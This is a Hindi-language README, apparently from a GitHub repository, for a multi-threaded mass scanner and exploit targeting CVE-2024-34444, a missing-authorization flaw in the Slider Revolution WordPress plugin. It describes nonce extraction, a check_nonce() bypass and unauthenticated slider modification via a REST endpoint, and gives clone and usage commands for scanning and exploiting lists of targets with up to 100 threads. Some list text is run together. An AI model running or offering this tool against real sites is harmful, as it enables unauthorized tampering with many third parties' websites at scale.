
CVE-2024-34444 (अनधिकृत प्राधिकरण की कमी) के लिए मल्टी-थ्रेडेड मास स्कैनर जो Slider Revolution WordPress प्लगइन में है। गैर-प्रमाणित स्लाइडर डेटा संशोधन के लिए REST API के माध्यम से नॉन्स निष्कर्षण, संस्करण पहचान और शोषण को स्वचालित करता है।
CVE-2024-34444 के लिए पेशेवर मास स्कैनर जो स्लाइडर रिवोल्यूशन वर्डप्रेस प्लगइन < 6.7.0 को प्रभावित करता है
Banner
CVE-2024-34444 स्लाइडर रिवोल्यूशन वर्डप्रेस प्लगइन (संस्करण < 6.7.0) में एक मिसिंग ऑथराइज़ेशन भेद्यता है। यह स्कैनर REST API एंडपॉइंट /wp-json/revslider/v1/slider/save के माध्यम से कमजोर इंस्टॉलेशन का पता लगाने और उनका शोषण करने को स्वचालित करता है।
भेद्यता श्रृंखला:
revslider_actions नॉन्स निकालेंcheck_nonce() को बायपास करने के लिए नॉन्स का उपयोग करेंreadme.txt के माध्यम से स्वचालित संस्करण पहचान-v)-o)git clone https://github.com/dzmind2312/CVE-2024-34444.git
cd CVE-2024-34444
pip3 install -r requirements.txt
# Single target
python3 exploit.py -u https://target.com
# Single target with verbose
python3 exploit.py -u https://target.com -v
# Mass scan from list
python3 exploit.py -l targets.txt -t 20
# Mass scan with output file
python3 exploit.py -l sites.txt -t 50 -o vulnerable.txt
# Full example with all options
python3 exploit.py -l targets.txt -t 100 -o results.txt -v